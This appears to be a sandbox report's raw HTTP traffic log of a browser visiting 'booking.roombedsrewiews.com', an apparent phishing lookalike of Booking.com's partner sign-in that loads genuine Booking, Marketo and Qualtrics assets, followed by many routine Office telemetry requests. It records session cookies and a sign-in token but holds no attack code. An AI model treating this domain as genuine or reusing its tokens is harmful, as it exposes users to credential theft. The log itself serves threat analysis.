                Source: global trafficHTTP traffic detected: GET /static/otBannerSdk.js HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/css_H7dPp81WTvvS--0HVXMJ9Hozig2DMTF7X1aURkZvL00.css HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /static/asset_332_350x180px.png.png HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /munchkin.js HTTP/1.1Host: munchkin.marketo.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://booking.roombedsrewiews.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /themes/custom/booking/fonts/icons/icons.woff?v=1.3.3 HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-aliveOrigin: https://booking.roombedsrewiews.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://booking.roombedsrewiews.com/static/css_3iFMQAIstg4teIom2wVaOik81XAQ5V-7tH-iz2mq5to.cssAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm
                Source: global trafficHTTP traffic detected: GET /164/munchkin.js HTTP/1.1Host: munchkin.marketo.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://booking.roombedsrewiews.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /themes/custom/booking/fonts/icons/icons.ttf?v=1.3.3 HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-aliveOrigin: https://booking.roombedsrewiews.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://booking.roombedsrewiews.com/static/css_3iFMQAIstg4teIom2wVaOik81XAQ5V-7tH-iz2mq5to.cssAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm; _mkto_trk=id:261-NRZ-371&token:_mch-roombedsrewiews.com-764a5b858e31211af6451cf3b0b18c94
                Source: global trafficHTTP traffic detected: GET /themes/custom/booking/images/favicons/site.webmanifest HTTP/1.1Host: partner.booking.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://booking.roombedsrewiews.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://booking.roombedsrewiews.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /themes/custom/booking/images/favicons/favicon.svg HTTP/1.1Host: partner.booking.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://booking.roombedsrewiews.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /SIE/?Q_ZID=ZN_3Eum1ldyL0aIh0i HTTP/1.1Host: zn3eum1ldyl0aih0i-partnersatbooking.siteintercept.qualtrics.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://booking.roombedsrewiews.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /themes/custom/booking/images/favicons/favicon.ico HTTP/1.1Host: partner.booking.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://booking.roombedsrewiews.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /dxjsmodule/8.7128e66c4069227926d7.chunk.js?Q_CLIENTVERSION=2.27.0&Q_CLIENTTYPE=web&Q_BRANDID=booking.roombedsrewiews.com HTTP/1.1Host: siteintercept.qualtrics.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://booking.roombedsrewiews.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: roombedsrewiews.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=n8kvo31qnq76cvo3qgfa7ohp3v
                Source: global trafficHTTP traffic detected: GET /api?c=1 HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-alivesec-ch-ua-platform: "Windows"X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://booking.roombedsrewiews.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDIAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm; _mkto_trk=id:261-NRZ-371&token:_mch-roombedsrewiews.com-764a5b858e31211af6451cf3b0b18c94
                Source: global trafficHTTP traffic detected: GET /dxjsmodule/CoreModule.js?Q_CLIENTVERSION=2.27.0&Q_CLIENTTYPE=web&Q_BRANDID=partnersatbooking HTTP/1.1Host: siteintercept.qualtrics.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://booking.roombedsrewiews.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /WRSiteInterceptEngine/Targeting.php?Q_ZoneID=ZN_3Eum1ldyL0aIh0i&Q_CLIENTVERSION=2.27.0&Q_CLIENTTYPE=web HTTP/1.1Host: siteintercept.qualtrics.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /dxjsmodule/5.76657644fe1b73dc4306.chunk.js?Q_CLIENTVERSION=2.27.0&Q_CLIENTTYPE=web&Q_BRANDID=partnersatbooking HTTP/1.1Host: siteintercept.qualtrics.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://booking.roombedsrewiews.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /dxjsmodule/1.63482081f3bf73c57075.chunk.js?Q_CLIENTVERSION=2.27.0&Q_CLIENTTYPE=web&Q_BRANDID=partnersatbooking HTTP/1.1Host: siteintercept.qualtrics.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://booking.roombedsrewiews.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /api?c=1 HTTP/1.1Host: booking.roombedsrewiews.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=tk99b2tsgjf1j000jdsqcfj2pm; _mkto_trk=id:261-NRZ-371&token:_mch-roombedsrewiews.com-764a5b858e31211af6451cf3b0b18c94
                Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
